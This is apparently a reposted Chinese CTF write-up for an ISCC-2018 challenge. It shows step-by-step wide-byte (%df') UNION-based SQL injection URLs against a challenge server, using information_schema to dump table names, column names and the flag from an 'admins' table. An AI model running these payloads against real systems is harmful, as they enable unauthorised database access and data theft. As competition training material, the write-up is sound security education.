码迷,mamicode.com
首页 > 其他好文 > 详细

ISCC-2018

时间:2018-05-03 00:55:53      阅读:167      评论:0      收藏:0      [点我收藏+]

标签:bubuko   limit   flag   admin   auto   ase   sel   .com   width   

SQL 注入的艺术

在源码看到gb2312,宽字节注入无疑

 

技术分享图片

查字段   

         http://118.190.152.202:8015/index.php?id=1%df‘ order by 8%23

 

回显字段

http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,4,5,6,7,8%23

  

    技术分享图片

查库

 http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,database(),5,6,7,8%23

爆表得admins

http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,table_name,5,6,7,8+from+information_schema.tables+where+table_schema=database()+limit+0,1%23

爆列名得flag列

http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e73+limit+7,1%23

拿flag

http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,flag,5,6,7,8+from+admins%23

技术分享图片

 

ISCC-2018

标签:bubuko   limit   flag   admin   auto   ase   sel   .com   width   

原文地址:https://www.cnblogs.com/feicai/p/8983227.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!